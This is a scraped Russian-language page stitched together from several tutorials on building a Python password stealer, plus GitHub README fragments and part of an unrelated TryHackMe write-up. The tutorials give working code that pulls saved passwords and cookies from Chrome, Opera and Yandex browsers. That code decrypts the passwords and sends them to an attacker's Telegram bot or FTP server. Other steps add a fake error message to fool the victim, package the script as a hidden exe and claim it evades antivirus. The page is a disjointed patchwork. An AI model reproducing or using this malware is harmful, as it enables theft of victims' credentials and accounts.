Как сделать стиллер паролей на python
Перейти к содержимому

Как сделать стиллер паролей на python

  • автор:

Name already in use

Work fast with our official CLI. Learn more about the CLI.

Sign In Required

Please sign in to use Codespaces.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching Xcode

If nothing happens, download Xcode and try again.

Launching Visual Studio Code

Your codespace will open once ready.

There was a problem preparing your codespace, please try again.

Latest commit

Git stats

Files

Failed to load latest commit information.

README.md

Script was developed for only educational purposes
Author of script is not responsible for the harm caused by this proggramm

  • Script can be expanded with every chromium based browser
  • Script scrapping PC-info, collecting cookies and passwords
  • Script almost prepared for compiling (was tested with py2exe)
  • fastest data gathering, sending via telegram
  1. Clone the repo:
  1. Install python side-packages:
  1. Rename example.yml to cfg.yml and change all variables to proper

P.S Script is only supporting Windows Pc’s at the momment

Don’t forget to support author with your star ⭐ with love Barbiewir3 ❤️

About

Python script created for educational purposes. Chromium browsers cookies and passwords stealer, send via telegram

TryHackMe: The Marketplace Writeup

Yebberdog

This is a medium level machine and looking at the tags we will be focusing on web, xss, docker and sqli. Actually this box was a awesome ride and I really enjoyed the challenge.

Let’s start with a quick scan of all ports to see what is open:

So we have three open ports available. I will run a version scan with scripts to see if we can find out more information on these open ports:

So we have ssh open on port 22, a web server running nginx1.19.2 on port 80 and a webserver running Node.js on port 32768.

On port 80 we can see that the report has identified a robots.txt file with one disallowed entry ‘/admin’ and the title is The Marketplace. The Node.js server on port 32768 mirrors that of port 80 to support Node.js.

Web Server — Port 80:

Navigating to the website we see the following:

As with all web enumeration, it is best to start by exploring all the pages and where there are input fields, trying common vulnerability checks for xss and sqli etc.

To automate this quickly, I used the zap vulnerability scanner and proxy to initially spider the site and then run an automated scan. I then started exploring the site using the built in Zap browser which is also configured as a proxy.

Working through the site I created an account, logged in, created a new listing and then reported the listing to the admins. I then re-ran the active scan.

Xss Vulnerability:

We can see from the scan that it detects a potential xss vulnerability on the /new form for the parameter ‘description’, this is rated as high risk with a confidence level of ‘Medium’

We can try to inject some simple code into this field as a proof of concept. Let’s try and open up an alert box using a simple js command.

As we can see the proof of concept works and we get our alert box pop up on the screen.

You will notice that if you leave the page via the home button and then select on the listing you have just created, the alert pops up again. This is a stored xss and probably means that the script we used is being written to a database.

Looking at the page request we can also see that we have a cookie assigned when we logged into our account. A classic xss exploit would be to capture other users cookies so we can log in as them and capture privileged information.

This is exactly what we need to do here. Remember we have the option to report the listing to the admin. If we look at our messages, we can see the following:

So it would appear that the admin has reviewed our listing and found nothing that violates their rules. If we can capture the admins cookie when they visit the listing, then we should be able to impersonate the admin with full privileges.

To do this we need to modify our script to grab the admin cookie and store that information somewhere where we can access and use it. To do this I am going to use a cookie stealing script which will basically setup an http server on my attack system to log cookies captured from the injected script through the xss vulnerability. All the information required to achieve this can be found at the link below.

Python Статья пишем свой стиллер на Python

[/I]
Установка Python
Переходим на официальный сайт PythonА — ТЫК. Скачиваем 3+ версию и устанавливаем ее.

Суть работы стиллера
Программа проверит наличие папок от указанных браузеров, при наличии — подключится к базе данных(LoginData) и достанет от туда сохраненные логины,пароли от сайтов. После полученные данные программа отправит от имени бота в чат телеграм. Вот и все)
Создадим своего бота
Как по мне, очень удобно при частом пребывании в телеграме получать в личные сообщения логи со стиллера. Поэтому мы создадим своего бота, который будет нам отправлять украденные логины и пароли.
Для начала мы должны создать нашего бота, в этом нам поможет @BotFather, запускаем с ним диалог и создаем нового бота,которому мы должны придумать имя с окончанием "_bot". После BotFather выдаст нам token для управления нашим ботом.
Код:
Код (Python):

С ботом мы разобрались, идем дальше.

Начинаем кодить
Сначала нам нужно установить библиотеки, которые будут использованы в нашей программе
Для этого запустим терминал(cmd) и обновим питоновский установщик пакетов.
Код (Python):

[/LIST]
#создаем список с названиями браузеров, которые у нас есть. Названия расположены в порядке списка lsdir

Я добавил только 4, как по мне самых распространенных браузеров. Вы можете сами добавлять другие браузеры на движке Chromium
При добавлении/редактировании директорий, нужно использовать двойной, обратный слэш(\\), иначе будет выбивать ошибку,связанную с кодировкой.
___
Теперь приступим к расшифровке паролей и отправке полученных данных в телеграм.
Код:
Код (Python):

Как написать стиллер паролей на python

первая библиотека ( os.path ) — используется для проверки директории на валидность, точнее на то существует ли она в природе
вторая библиотека ( getpass ) — используется для получения юзернейма пользователя под которым запущен процесс, это нужно для доступа к папке AppData
третья библиотека ( ftplib ) — тут самое интересное, она нам поможет отправлять пароли по FTP на наш сервер
четвертая библиотека( random ) — ну тут все просто, мы рандомизируем названия файла который отправляем на сервер

И напоследок мы подключаемся по ftp по логину паролю и хосту.

Теперь перейдем к более интересным вещам, чем просто библиотеки, мы напишем уже сами пути к директориям, где лежат наши пароли, а пароли мы будем воровать(в учеб.целях) из браузеров — Opera, Yandex, Google Chrome

Итак, вот код, пишем его, далее будем его разбирать

UserName — принимает значения имя текущего пользователя

dir_cookie_google, dir_pass_google, …., … — и т.д. Это все директории где хранятся пароли, нам интерестны именно эти 3 браузера. Будем забирать пароли и куки и перекидывать их себе на сервер по FTP. Потом открывать в sqlite manager, но об этом позже….

У нас имеются директории, у нас есть библиотеки, для работы, что же дальше? Думаю пора приступать к основном задаче, это написание непосредственно стиллера.

Вот код, вы пока напишите его, а я вам потом расскажу о нем ))

Код получился не маленький, что есть то есть. Рассмотрим первые строчки, в начале до функции мы записываем в переменные адреса наших директорий, для последующей проверки на валидность. Зачем это нужно? спросите вы меня, да просто так проще! Зачем ставить try, except если можно проверить на валидность с помощью os.path.exits.

Далее у нас идет функция, со множествами if , тут ничего ничего сложного нету, все просто:

Мы проверяем является ли директория валидной, а после уже открываем ее, и отправляем файл на наш сервер FTP. Такс…, функцию написали, библиотеки подключили, директории есть, что не хватает? Думаю не хватает задействовать функцию и вывести на экран какую нибудь псевдо-ошибку, что мол библиотека не подключена и все дела.. Будем действовать по такой схеме))

Вот код, объяснять тут думаю нечего:

НО, я все же расскажу, первая строка — вызываем функцию, которая ворует пароли.

Далее мы выводим сообщения об якобы ошибке которой на деле и нет, что бы пользователь думал что это у него проблемы какие то. И что программа не зловредная, а наоборот, пыталась помочь. но как оказалось библиотеки видите ли у него нет))

Вот и весь код, ниже он целиком:

У нас есть код, но он на пайтоне, как же его эксплуатировать на чужом ПК?

Думаю ответ очевиден — pyinstaller

Давайте скачаем его:

Далее скомпилируем его в EXE’шник, дабы было все проще у нас ))

Вот и все, по сути у нас есть EXE файл, который не палится антивирусами, ну разве что windows защитник может его заподозрить, все же мы ходим по директориям. Кроме того еще и отправляем файлы на какой то не понятный сервер…. НО на практике kaspersky, dr.web, и др популярные антивирусы не определяют его как вредоносное программное обеспечения, даже если ему тыкнуть носом, вот мол, смотри, давай его просканируем, может там вирусы трояны бэкдоры! он говорит — нет, там нету ничего….

Вот так вот все, всем спасибо! рад был поделится с вами своим скриптом

Простой мод с помощью ChatGPT и, несмотря на ограничения менее чем за 5 минут, чтобы он отправил данные в телеграмме

Пишем свой стиллер на Python

Привет. Пришло время написать свой собственный стиллер на чудном языке Python.

Комментарии будут отмечены решеточкой — #

Установка Python​

Переходим на официальный сайт PythonА.

Скачиваем 3+ версию и устанавливаем ее.

Суть работы стиллера​

Программа проверит наличие папок от указанных браузеров, при наличии — подключится к базе данных(LoginData) и достанет от туда сохраненные логины,пароли от сайтов. После полученные данные программа отправит от имени бота в чат телеграм. Вот и все)

Создадим своего бота​

Как по мне, очень удобно при частом пребывании в телеграме получать в личные сообщения логи со стиллера. Поэтому мы создадим своего бота, который будет нам отправлять украденные логины и пароли.

Для начала мы должны создать нашего бота, в этом нам поможет @BotFather, запускаем с ним диалог и создаем нового бота,которому мы должны придумать имя с окончанием «_bot». После BotFather выдаст нам token для управления нашим ботом.

После всех вышеперечисленных действий мы должны перейти по ссылке, отправить боту любое сообщение с нужного вам аккаунта и обновить открытый сайт, в итоге мы получим кучу разных данных, в которых нам нужно найти и сохранить chat id.

https://api.telegram.org/botВашToken/getUpdates #перейти по данной ссылке

С ботом мы разобрались, идем дальше.

Начинаем кодить​

Сначала нам нужно установить библиотеки, которые будут использованы в нашей программе

Для этого запустим терминал(cmd) и обновим питоновский установщик пакетов.

pip install —upgrade pip

После обновления установим 2 нужные нам библиотеки,pyTelegramBotAPI pywin32 и telebot

pip install pyTelegramBotAPI

pip install pywin32

pip install telebot

В самом начале программы, мы должны подключить библиотеки, которые мы будем использовать в нашем коде.

Код:

from os import getlogin #из библиотеки os мы импортируем функцию getlogin

#данная библиотека поможет нам получить имя пользователя компьютера

import sqlite3 #импортируем библиотеку sqlite3
#данная библиотека даст возможность работать с базами данных

import win32crypt #импортируем библиотеку win32crypt

#эта библиотека поможет расшифровать пароли из базы данных

import telebot #импортируем библиотеку telebot

#с помощью этой библиотеки мы будем отправлять сообщения от нашего бота.

Теперь нам нужно задать переменные, которые мы будет использовать.

Код:

t0ken = «ВАШ:Т0КЕН»» #переменная t0ken – в которой хранится token от бота

b0t = telebot.TeleBot(t0ken) #создаем переменную b0t – которая отвечает за создание бота и имеет атрибут в виде переменной t0ken

name_0f_user = getlogin() # переменная, которая с помощью функции getlogin получает имя учетной записи пользователя.

Дальше мы должны создать переменные,списки с директориями возможных браузеров.

Код:

op3ra = «C:\Users\» + name_0f_user + «<\AppData\Roaming\Opera Software\Opera Stable\>» + «Login data»

#переменная op3ra которая равна такому пути

C:\Users\Users\AppData\Roaming\Opera Software\Opera Stable\LoginData — где Login Data — база данных, а остальное — путь к папке браузера.

g00gle = «C:\Users\» + name_0f_user + «<\AppData\Local\Google\Chrome\User Data\Default\>» + «Login Data» #также как и выше

yand3x = «C:\Users\» + name_0f_user + «<\AppData\Local\Yandex\YandexBrowser\User Data\Default\>» + «Login Data» #также как и выше

c0m0d0drag0n = «C:\Users\» + name_0f_user + «<\AppData\Local\Comodo\Dragon\User Data\Default\>» + «Login Data» #также как и выше

lsdir=[op3ra,g00gle,yand3x,c0m0d0drag0n] #создаем список в котором хранятся наши переменные с директориями браузеров.

lsbr0wser=[«Opera»,»Google Chrome»,»Yandex Browser»,»Comodo Dragon»] #создаем список с названиями браузеров, которые у нас есть. Названия расположены в порядке списка lsdir

Я добавил только 4, как по мне самых распространенных браузеров. Вы можете сами добавлять другие браузеры на движке Chromium

При добавлении/редактировании директорий, нужно использовать двойной, обратный слэш(\), иначе будет выбивать ошибку,связанную с кодировкой.

Теперь приступим к расшифровке паролей и отправке полученных данных в телеграм.

Код:

b0t.send_message(ваш id, «Компьютер: » + name_0f_user) #для начала мы отправим в чат имя системы жертвы

#b0t — имя бота,которого мы создали в начале

#send_message — функция для отправки сообщения,которая принимает такие аргументы: id чата,который мы получили ранее и текст,который мы желаем отправить, в данном случае, слово «Компьютер:» объединенное с переменой name_0f_user

for i in range(len(lsdir)): #запускаем цикл, который будет длится от переменной i до длины списка lsdir, от 0 до 4

try: #попробовать сделать следующие действия, если не получится, то выполнить действия после except

br0wser=lsdir[i] #переменной br0wser присвоим элемент списка под номером [i]

connecti0n = sqlite3.connect(br0wser) #начинаем работу с sqllite, создаем переменную, которая равняется подключению базы данных, которая находится по адресу br0wser

curs0r = connecti0n.cursor() #создаем переменную curs0r, которая отвечает за создание объекта для взаимодействия с базой данных

curs0r.execute(‘SELECT origin_url, username_value, password_value FROM logins’) #переменной curs0r мы говорим достать из базы данных нам такие значения — origin_url(ссылка на сайт где был введен логин и пароль),username_value(логин), password_value(пароль)

for ii in curs0r.fetchall(): #создаем цикл, который будет длится от нуля(ii), до всех значений, которые можно получить из базы данных(curs0r.fetchall)

d3cryptpass = win32crypt.CryptUnprotectData(ii[2]) #переменной d3cryptpass присваиваем значение расшифровки пароля(второго элемента в списке значений, добытых из базы данных), функцией CryptUnprotectData(библиотека win32crypt)

b0t.send_message(id_вашего_чата, lsbr0wser[i]) #в чат от имени бота отправляем сообщение с i-тым элементом из списка текстовых названий браузеров.

b0t.send_message(id_вашего_чата, «—————————-«) #отправляем от имени бота сообщение в чат с разделительной линией/украшением

b0t.send_message(id_вашего_чата, «Сайт: » + ii[0]) #в чат от имени бота отправляем слово «сайт» + нулевой элемент в списке

b0t.send_message(id_вашего_чата, «—————————-«) #отправляем от имени бота сообщение в чат с разделительной линией/украшением

b0t.send_message(id_вашего_чата, «Логин: » + ii[1]) #в чат от имени бота отправляем слово «логин» + первый элемент в списке

b0t.send_message(id_вашего_чата, «—————————-«) #отправляем от имени бота сообщение в чат с разделительной линией/украшением

d3cryptpass=str(d3cryptpass) #переменной d3cryptpass- присваиваем значение d3cryptpass, только переводим ее в текстовый тип данных(str)

b0t.send_message(id_вашего_чата, «Пароль: » + d3cryptpass) #в чат от имени бота отправляем слово «пароль» + переменную d3cryptpass

b0t.send_message(id_вашего_чата, «—————————-«) #отправляем от имени бота сообщение в чат с разделительной линией/украшением

except: #если действие после try не заработало/выдало ошибку, то выполнить действие после except

b0t.send_message(id_вашего_чата,»Браузер » + lsbr0wser[i] + » был запущен, или не установлен») #в чат от имени бота отправляем слово «браузер» + i-тый элемент в списке с названиями браузеров(lsbr0wser) + сообщение об ошибке

Теперь я попытаюсь объяснить суть вышеописанного кода на «простом» примере)

Компилируем в exe​

Ясное дело, что python скрипт мы не будем распространять, поэтому мы скомпилируем его в exe файл. Для компиляции нам нужно будет установить специальную утилиту pyinstaller для компиляции py в exe

pip install pyinstaller

После установки мы должны открыть папку с нашей программой на питоне и запустить pyinstaller с такими аргументами

-F соберет все файлы в один exe файл

-w отключит консоль

-i *путь к иконке* аргумент,который подключит к программе иконку​

CD C:compile

pyinstaller -i i.ico -F -w stealer.py

#В терминала переходим в папку C:compile

#вызываем pyintaller, где i.ico — иконка расположенная в папке compile;stealer.py — наш питоновский скрипт, расположенный в папке compile

После в папке dist появится наш код скомпилированный в EXE.

Вот мы и написали наш простой стиллер, мы смогли уложится в 34 строчки кода.

У меня готовый стиллер запускается за 5 секунд и имеет вес в 6 мегабайт.

Проверить на детекты, я не смог, ибо viruschekmate,ScanMyBin — сдохли,nodstribute+virustotal — сливают данные(не суйте туда стиллер)), поэтому информация про «чистоту» остается для вас и для меня интригой)

Не забудь подписаться на Coding и поделиться каналом с друзьями

Что будем делать?

Здравствуй, читатель сегодня поговорим о том почему не надо открывать непроверенные файлы скачанные с неизвестных источников и создадим такой файл чтобы понять что он может наделать на вашем ПК. Создавать мы будем стиллер который соберет все наши пароли и отправит их нам по почте.

Что для этого нужно?

  1. Python 3.x.x
  2. Инструмент для восстановления паролей(в нашем случае LaZagne)
  3. Два аккаунта Google

И так начинаем

Для начала поместим .exe файл инструмента LaZagne в папку с нашим проектом. Далее создадим .bat файл с любым названием(у меня будет main.bat) и файл send.py.

У нас должна получится такая структура:

  • laZagne.exe
  • send.py
  • main.bat

Пишем код

Откроем файл main.bat и поместим туда код:

Теперь при запуске нашего .bat файла у нас появится файл pass.txt в котором будут все ваши пароли из браузеров(и не только). Осталось только отправить данные на почту. Но как это сделать?

Отправка на почту

Открываем файл send.py и вставляем код:

Теперь нужно настроить и в зависимости от сервиса по которому будете отправлять почту изменяем выделенный код: Google (прежде нужно разрешить доступ для менее безопасных приложений):

Доделываем .bat

Теперь в наш .bat файл добавим код запуска файла send.py и удаления файла pass.txt:

Сборка

Теперь после запуска main.bat ваши пароли будут отправлены к вам на почту но если у вас не установлен Python то ничего не получится нужно превратить наш send.py файл в exe. Для этого открываем консоль и пишем:

Еще но нужно превратить main.bat файл в main.exe, и в этом нам поможет Bat To Exe Converter. Жмем на кнопку с тремя точками(«…») и ищем ваш файл main.bat, жмем «Открыть», после чего жмем «Convert» и получаем файл main.exe. Эти три файла и есть наш стиллер, можем отправлять другу и радоваться проверять на работоспособность.

Ссылки

  • Google
  • LaZagne
  • Bat To Exe Online Converter

Привет. Пришло время написать свой собственный стиллер на чудном языке Python . Оформление,заголовки и куски текста, я буду брать из своей прошлой статьи , ибо есть повторяющееся моменты, а делать рерайт на них, я не вижу смысла)
Словарик с терминами,которые я буду использовать, можно найти по ссылке — ТЫК
Комментарии будут отмечены решеточкой — #

Переходим на официальный сайт Python А — ТЫК . Скачиваем 3+ версию и устанавливаем ее.
1.png 2.png3.png

Программа проверит наличие папок от указанных браузеров , при наличии — подключится к базе данных( LoginData ) и достанет от туда сохраненные логины,пароли от сайтов. После полученные данные программа отправит от имени бота в чат телеграм . Вот и все)

Как по мне, очень удобно при частом пребывании в телеграме получать в личные сообщения логи со стиллера . Поэтому мы создадим своего бота , который будет нам отправлять украденные логины и пароли.
Для начала мы должны создать нашего бота, в этом нам поможет @BotFather , запускаем с ним диалог и создаем нового бота,которому мы должны придумать имя с окончанием « _bot « . После BotFather выдаст нам token для управления нашим ботом.

После всех вышеперечисленных действий мы должны перейти по ссылке, отправить боту любое сообщение с нужного вам аккаунта и обновить открытый сайт, в итоге мы получим кучу разных данных, в которых нам нужно найти и сохранить chat id.

upload_2018-5-25_17-27-37.png

С ботом мы разобрались, идем дальше.

Сначала нам нужно установить библиотеки, которые будут использованы в нашей программе
Для этого запустим терминал( cmd ) и обновим питоновский установщик пакетов.

После обновления установим 2 нужные нам библиотеки, pyTelegramBotAPI pywin32 и telebot

______________________________________________________________________________________
В самом начале программы, мы должны подключить библиотеки, которые мы будем использовать в нашем коде.

_______________________________________________________________________________
Теперь нам нужно задать переменные, которые мы будет использовать.

_______________________________________________________________________________
Дальше мы должны создать переменные,списки с директориями возможных браузеров.

Я добавил только 4, как по мне самых распространенных браузеров. Вы можете сами добавлять другие браузеры на движке Chromium
При добавлении/редактировании директорий, нужно использовать двойной, обратный слэш( \ ), иначе будет выбивать ошибку,связанную с кодировкой.
_______________________________________________________________________________
Теперь приступим к расшифровке паролей и отправке полученных данных в телеграм .

Теперь я попытаюсь объяснить суть вышеописанного кода на « простом « примере)

Жертва запускает наш стиллер , программа пробует( try ) пройтись по нулевому[ i ] элементу в списке и подключится к базе данных,если у нее это получается, то она собирает данные и отправляет в чат телеграм , если что-то не получается, то программа не крашится, а выполняет действие указанное( except ) в случае ошибки. Дальше программа проходит второй круг( при втором круге счетчик i увеличивается на один ), но уже по первому[ i ] элементу в списке и выполняет все как и раньше. Так будет происходить, пока работает цикл, а он работает от нуля[ i ] до длины списка с директориями.

Ясное дело, что python скрипт мы не будем распространять, поэтому мы скомпилируем его в exe файл. Для компиляции нам нужно будет установить специальную утилиту pyinstaller для компиляции py в exe

После установки мы должны открыть папку с нашей программой на питоне и запустить pyinstaller с такими аргументами

-F соберет все файлы в один exe файл
-w отключит консоль
-i *путь к иконке* аргумент,который подключит к программе иконку ​

После в папке dist появится наш код скомпилированный в EXE . У меня готовый стиллер запускается за 5 секунд и имеет вес в 6 мегабайт.
Проверить на детекты, я не смог, ибо viruschekmate , ScanMyBin — сдохли, nodstribute + virustotal — сливают данные( не суйте туда стиллер ) ), поэтому информация про «чистоту» остается для вас и для меня интригой)

Исходники вы можете скачать по ссылке — ТЫК
upload_2018-5-26_12-46-24.pngТак приходят логи, пароль находится между символом b’ и ‘

Вот мы и написали наш простой стиллер , мы смогли уложится в 34 строчки кода. Надеюсь вам все было понятно, пытался писать как можно проще . Если будет интересно, могу объяснить как добавить фейк ошибку при запуске стиллера )
Если вам что-то не понравилось, или есть идеи по улучшению — прошу сообщить об этом :-)
P.S.
Словарик дополню новыми терминами

Вся информация написана в целях ознакомления, автор не несет ответственность за использование данного материала

Начинаем
Скачиваем, устанавливаем и запускаем Python
>>>ТЫК<<<

import os.path
import getpass
from ftplib import FTP
import random
con = FTP(«хост»,»логин»,»пароль»)

Первая библиотека (os.path) — используется для проверки директории на валидность, точнее на то, существует ли она в природе.

Вторая библиотека (getpass) — используется для получения юзернейма пользователя, под которым запущен процесс, это нужно для доступа к папке AppData.

Третья библиотека (ftplib) — тут самое интересное, она нам поможет отправлять пароли по FTP на наш сервер.

Четвертая библиотека (random) — ну тут все просто, мы рандомизируем названия файла, который отправляем на сервер.

И напоследок, мы подключаемся по ftp по логину, паролю и хосту.

Теперь перейдем к более интересным вещам, чем просто библиотеки, напишем уже сами пути к директориям, где лежат наши пароли, а пароли будем воровать из браузеров — Opera, Yandex, Google Chrome.

Итак, вот код, пишем его, далее будем его разбирать:

UserName = ‘\’ + getpass.getuser()
dir_cookie_google = ‘C:\Users’+UserName+’\AppData\Local\Google\Chrome\User Data\Default\Cookies’
dir_pass_google = «C:\Users»+UserName+»\AppData\Local\Google\Chrome\User Data\Default\Login Data»

dir_cookie_yandex = «C:\Users»+UserName+»\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cookies»
dir_pass_yandex = «C:\Users»+UserName+»\AppData\Local\Yandex\YandexBrowser\User Data\Default\Password Checker»

dir_cookie_opera = «C:\Users»+UserName+»\AppData\Roaming\Opera Software\Opera Stable\Cookies»
dir_pass_opera = «C:\Users»+UserName+»\AppData\Roaming\Opera Software\Opera Stable\Login Data»

UserName — принимает значения имя текущего пользователя.

dir_cookie_google, dir_pass_google, …., … — и т.д. Это все директории где хранятся пароли, нам интерестны именно эти 3 браузера. Будем забирать пароли и куки и перекидывать их себе на сервер по FTP. Потом открывать в sqlite manager, но об этом позже.

У нас имеются директории, у нас есть библиотеки для работы, что же дальше? Пора приступать к основной задаче — написанию стиллера.

Вот код, запишите его и начнем разбирать:

dir_google = «C:\Users»+UserName+»\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies»
dir_firefox = «C:\Users»+UserName+»\AppData\Roaming\Mozilla\Firefox»
dir_yandex = «C:\Users»+UserName+»\AppData\Local\Yandex»
dir_opera = «C:\Users»+UserName+»\AppData\Roaming\Opera Software»

def check():
if (os.path.exists(dir_google)) == True:
filename = «google»+str(random.randint(1, 10000))
filename2 = «google_pass» + str(random.randint(1, 10000))
with open(dir_cookie_google, «rb») as content:
con.storbinary(«STOR %s» % filename, content)
with open(dir_pass_google, «rb») as content:
con.storbinary(«STOR %s» % filename2, content)
if (os.path.exists(dir_opera)) == True:
filename = «opera»+str(random.randint(1, 10000))
filename2 = «opera_pass» + str(random.randint(1, 10000))
with open(dir_cookie_opera, «rb») as content:
con.storbinary(«STOR %s» % filename, content)
with open(dir_pass_opera, «rb») as content:
con.storbinary(«STOR %s» % filename2, content)
if (os.path.exists(dir_yandex)) == True:
filename = «yandex»+str(random.randint(1, 10000))
filename2 = «yandex_pass» + str(random.randint(1, 10000))
with open(dir_cookie_yandex, «rb») as content:
con.storbinary(«STOR %s» % filename, content)
with open(dir_pass_yandex, «rb») as content:

Рассмотрим первые строчки. В начале, до функции, мы записываем в переменные адреса наших директорий для последующей проверки на валидность. «Зачем это нужно?», — спросите вы меня. Да так проще! Зачем ставить try, except, если можно проверить на валидность с помощью os.path.exits.

Далее у идет функция, со множествами if, но тут ничего ничего сложного нет, все просто:

if (os.path.exists(dir_google)) == True:
filename = «google»+str(random.randint(1, 10000))
filename2 = «google_pass» + str(random.randint(1, 10000))
with open(dir_cookie_google, «rb») as content:
con.storbinary(«STOR %s» % filename, content)
with open(dir_pass_google, «rb») as content:
con.storbinary(«STOR %s» % filename2, content)

Мы проверяем, является ли директория валидной, а после открываем ее, и отправляем файл на наш сервер FTP.

Такс… Функцию написали, библиотеки подключили, директории есть. Чего не хватает? Думаю, не хватает задействовать функцию и вывести на экран какую-нибудь псевдо-ошибку, что мол библиотека не подключена и все дела.

check()
print(«Error library import HOUII.dll»)
print(«Error RUN cheat»)
input()

Первая строка — вызов функции, которая ворует пароли.

Далее выводим сообщения об «ошибке», чтобы пользователь думал, что это у него проблемы какие то. И что программа не зловредная, а наоборот, пыталась помочь. Но, как оказалось, библиотеки видите ли у него нет.

Ниже весь код целиком:

import os.path
import getpass
from ftplib import FTP
import random

dir_cookie_google = ‘C:\Users’+UserName+’\AppData\Local\Google\Chrome\User Data\Default\Cookies’
dir_pass_google = «C:\Users»+UserName+»\AppData\Local\Google\Chrome\User Data\Default\Login Data»
dir_cookie_yandex = «C:\Users»+UserName+»\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cookies»
dir_pass_yandex = «C:\Users»+UserName+»\AppData\Local\Yandex\YandexBrowser\User Data\Default\Password Checker»
dir_cookie_opera = «C:\Users»+UserName+»\AppData\Roaming\Opera Software\Opera Stable\Cookies»
dir_pass_opera = «C:\Users»+UserName+»\AppData\Roaming\Opera Software\Opera Stable\Login Data»
dir_google = «C:\Users»+UserName+»\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies»
dir_firefox = «C:\Users»+UserName+»\AppData\Roaming\Mozilla\Firefox»
dir_yandex = «C:\Users»+UserName+»\AppData\Local\Yandex»
dir_opera = «C:\Users»+UserName+»\AppData\Roaming\Opera Software»

def check():
if (os.path.exists(dir_google)) == True:
filename = «google»+str(random.randint(1, 10000))
filename2 = «google_pass» + str(random.randint(1, 10000))
with open(dir_cookie_google, «rb») as content:
con.storbinary(«STOR %s» % filename, content)
with open(dir_pass_google, «rb») as content:
con.storbinary(«STOR %s» % filename2, content)
if (os.path.exists(dir_opera)) == True:
filename = «opera»+str(random.randint(1, 10000))
filename2 = «opera_pass» + str(random.randint(1, 10000))
with open(dir_cookie_opera, «rb») as content:
con.storbinary(«STOR %s» % filename, content)
with open(dir_pass_opera, «rb») as content:
con.storbinary(«STOR %s» % filename2, content)
if (os.path.exists(dir_yandex)) == True:
filename = «yandex»+str(random.randint(1, 10000))
filename2 = «yandex_pass» + str(random.randint(1, 10000))
with open(dir_cookie_yandex, «rb») as content:
con.storbinary(«STOR %s» % filename, content)
with open(dir_pass_yandex, «rb») as content:
con.storbinary(«STOR %s» % filename2, content)

check()
print(«Error library import HOUII.dll»)
print(«Error RUN cheat»)
input()

Компилируем в EXE
У нас есть код, но он на пайтоне, как же его эксплуатировать на чужом ПК?

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *